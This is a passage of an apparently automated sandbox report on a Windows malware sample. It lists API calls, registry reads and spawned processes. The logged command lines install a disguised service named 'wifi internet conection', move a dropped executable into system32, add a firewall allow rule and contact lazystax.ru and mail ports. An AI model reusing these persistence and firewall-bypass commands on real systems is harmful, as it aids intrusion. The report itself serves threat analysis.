(UID: 00000000-00005776)\n \"hdvvshgu.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005776)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004152)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00006128)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e666c@ADVAPI32.dll\"\n \"0e000f00703f666c@ADVAPI32.dll\"\n \"0e000f00cc3f666c@ADVAPI32.dll\"\n \"11001200b447666c@ADVAPI32.dll\"\n \"110012004848666c@ADVAPI32.dll\"\n \"120013008c48666c@ADVAPI32.dll\"\n \"12001300e448666c@ADVAPI32.dll\"\n \"14001500906e666c@ADVAPI32.dll\"\n \"14001500a86e666c@ADVAPI32.dll\"\n \"14001500c06e666c@ADVAPI32.dll\"\n \"17001800d86e666c@ADVAPI32.dll\"\n \"0d000e00f06e666c@ADVAPI32.dll\"\n \"11001200006f666c@ADVAPI32.dll\"\n \"11001200146f666c@ADVAPI32.dll\"\n \"0d000e003449666c@SHELL32.dll\"\n \"0d000e00b049666c@SHELL32.dll\"\n \"0f0010005470666c@ADVAPI32.dll\"\n \"140015009470666c@ADVAPI32.dll\"\n \"14001500ac70666c@ADVAPI32.dll\"\n \"0c000d00f470666c@ADVAPI32.dll\"\n \"0c000d000471666c@ADVAPI32.dll\"\n \"0e000f001471666c@ADVAPI32.dll\"\n \"0e000f002471666c@ADVAPI32.dll\"\n \"0b000c003471666c@ADVAPI32.dll\"\n \"140015006872666c@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004580)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005596)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hdvvshgu.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00004648)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\hdvvshgu ...\" (UID: 00000000-00005332), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00005808), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005676), Spawned process \"hdvvshgu.exe\" with commandline \"/d\"C:\\\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad371 ...\" (UID: 00000000-00005776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004152), Spawned process \"svchost.exe\" (UID: 00000000-00006128)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\hdvvshgu.exe\" %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\hdvvshgu.exe /d\\\"C:\\5d8cbd78849bb4f0eeb3099002\" - (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description tpxhoiko \"wifi internet conection\"\" - (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start tpxhoiko\" - (UID: 00000000-00004580)\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004580)\n \"hdvvshgu.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005596)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hdvvshgu.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00004648)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\hdvvshgu ...\" (UID: 00000000-00005332), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00005808), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005676), Spawned process \"hdvvshgu.exe\" with commandline \"/d\"C:\\\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad371 ...\" (UID: 00000000-00005776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004152), Spawned process \"svchost.exe\" (UID: 00000000-00006128)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"hdvvshgu.exe\" (UID: 00000000-00005776) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"hdvvshgu.exe\" (UID: 00000000-00005776) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004152) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004152) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00006128) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00006128) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\hdvvshgu.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00004648)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has an executable section named \".text\"\n \"hdvvshgu.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has an writable section named \".data\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has an writable section named \".text\"\n \"hdvvshgu.exe\" has an writable section named \".data\"\n \"hdvvshgu.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xe79000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xb17000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"hdvvshgu.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"hdvvshgu.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"hdvvshgu.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"hdvvshgu.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf\" was detected as \"VC8 -> Microsoft Corporation\"\n \"hdvvshgu.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"hdvvshgu.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hdvvshgu.exe]- [targetUID: 00000000-00004580]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"hdvvshgu.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" reads file \"c:\\5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\"\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"5d8cbd78849bb4f0eeb309900286aaef035e83974ab403526af1ad3716a194bf.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; 